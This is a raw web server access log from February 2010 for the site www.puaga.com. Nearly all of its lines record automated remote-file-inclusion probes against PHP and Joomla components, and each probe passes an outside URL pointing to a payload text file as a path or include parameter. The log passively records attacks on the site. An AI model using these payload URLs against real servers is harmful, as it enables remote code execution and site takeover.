58.230.162.220 - - [25/Feb/2010:05:25:34 -0800] "GET /logs/access_100121.log%20%20//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:25:34 -0800] "GET /toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:25:34 -0800] "GET /logs//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [25/Feb/2010:05:25:38 -0800] "GET /logs/access_100225.log HTTP/1.0" 200 2514239 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:25:55 -0800] "GET /logs/access_100129.log%20%20//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:05:26:40 -0800] "GET /administrator/components/com_babackup/classes=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:05:26:40 -0800] "GET /logs//administrator/components/com_babackup/classes=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:05:26:41 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:26:49 -0800] "GET /logs/access_100118.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:26:49 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:26:49 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:26:50 -0800] "GET /logs/access_100121.log%20%20//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:26:50 -0800] "GET /toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:26:50 -0800] "GET /logs//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:26:52 -0800] "GET /logs/access_100118.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:26:52 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:26:52 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:05:27:03 -0800] "GET /logs//administrator/components/com_babackup/classes=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:05:27:03 -0800] "GET /administrator/components/com_babackup/classes=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:05:27:04 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:27:05 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:27:05 -0800] "GET /logs/access_100118.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:27:05 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:27:10 -0800] "GET /logs/access_100129.log%20%20//toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:27:22 -0800] "GET /logs/access_100121.log%20%20//toolbar.php?dirDepth=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:27:22 -0800] "GET /logs//toolbar.php?dirDepth=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:27:22 -0800] "GET /toolbar.php?dirDepth=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:27:35 -0800] "GET /logs/access_100129.log%20%20//toolbar.php?dirDepth=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:27:50 -0800] "GET /logs/access_100129.log//toolbar.php?dirDepth=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:27:50 -0800] "GET /toolbar.php?dirDepth=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:27:50 -0800] "GET /logs/access_100127.log//toolbar.php?dirDepth=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:27:50 -0800] "GET /logs//toolbar.php?dirDepth=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:05:28:38 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [25/Feb/2010:05:29:01 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes=http://www.phimose-info.de/phimose-forum/Sources/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:29:34 -0800] "GET /logs/access_100121.log%20%20//toolbar.php?dirDepth=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:29:34 -0800] "GET /toolbar.php?dirDepth=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:29:34 -0800] "GET /logs//toolbar.php?dirDepth=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:29:53 -0800] "GET /logs/access_100129.log%20%20//toolbar.php?dirDepth=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:30:15 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:30:15 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:30:15 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:30:16 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:30:16 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:30:16 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [25/Feb/2010:05:30:18 -0800] "GET //BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.woojinmc.com/board/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.240.113.151 - - [25/Feb/2010:05:30:18 -0800] "GET /logs///BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.woojinmc.com/board/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.240.113.151 - - [25/Feb/2010:05:30:18 -0800] "GET /logs/access_100118.log%20///BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.woojinmc.com/board/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:30:23 -0800] "GET /logs/access_100206.log%20%20///bbs/write_update.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:30:27 -0800] "GET /logs/access_100206.log%20%20///bbs/write_update.php?board_skin_path=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [25/Feb/2010:05:30:44 -0800] "GET //BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.woojinmc.com/board/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.240.113.151 - - [25/Feb/2010:05:30:44 -0800] "GET /logs/access_100118.log%20///BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.woojinmc.com/board/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.240.113.151 - - [25/Feb/2010:05:30:44 -0800] "GET /logs///BOARD///BBS/WRITE_COMMENT_UPDATE.PHP/?BOARD_SKIN_PATH=http://www.woojinmc.com/board/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:32:30 -0800] "GET /logs/access_100210.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:32:30 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:32:30 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:32:36 -0800] "GET /logs/access_100210.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:32:36 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:32:36 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:33:01 -0800] "GET /logs/access_100210.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:33:01 -0800] "GET /booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:33:01 -0800] "GET /logs//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:33:18 -0800] "GET /logs/access_100127.log%20%20//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:33:18 -0800] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:33:18 -0800] "GET /com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:33:19 -0800] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:33:19 -0800] "GET /com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:33:19 -0800] "GET /logs/access_100127.log%20%20//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:33:25 -0800] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:33:25 -0800] "GET /logs/access_100127.log%20%20//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:33:25 -0800] "GET /com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:33:30 -0800] "GET /logs/access_100209.log%20%20//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:33:51 -0800] "GET /logs/access_100209.log%20%20//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:33:52 -0800] "GET /logs/access_100209.log%20%20//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:34:24 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:34:32 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:34:33 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:34:43 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:34:51 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:34:53 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:35:04 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:35:05 -0800] "GET /com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:35:05 -0800] "GET /logs/access_100127.log//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:35:05 -0800] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:35:08 -0800] "GET /logs/access_100209.log//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:35:11 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:35:28 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:35:33 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:35:37 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.38 - - [25/Feb/2010:05:35:45 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [25/Feb/2010:05:36:02 -0800] "GET /logs/access_100129.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:36:23 -0800] "GET /logs/access_100127.log%20%20//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:36:54 -0800] "GET /logs/access_100209.log%20%20//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:38:45 -0800] "GET /logs/access_100202.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:38:55 -0800] "GET /logs/access_100202.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [25/Feb/2010:05:39:47 -0800] "GET /component//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [25/Feb/2010:05:39:47 -0800] "GET /logs/access_100208.log//component//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [25/Feb/2010:05:39:47 -0800] "GET /logs//component//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:40:03 -0800] "GET /logs/access_100202.log%20%20//booth.php?include_path=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:42:21 -0800] "GET /logs/access_100215.log/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:42:21 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:42:23 -0800] "GET /?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:43:18 -0800] "GET /logs/access_100215.log/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:43:18 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:43:19 -0800] "GET /?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:44:19 -0800] "GET /logs/access_100214.log/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:44:21 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:44:21 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:44:21 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [25/Feb/2010:05:44:50 -0800] "GET /logs/access_100211.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:45:10 -0800] "GET /logs/access_100214.log/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:45:56 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:45:56 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:45:57 -0800] "GET /?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:46:27 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:46:28 -0800] "GET /logs/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:46:28 -0800] "GET /?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:47:14 -0800] "GET /logs/access_100214.log%20%20/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.46.66 - - [25/Feb/2010:05:47:39 -0800] "GET /logs/access_100214.log%20%20/?INCLUDE_FOLDER=http://www.sinaelee.com/lib/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:48:23 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:48:23 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
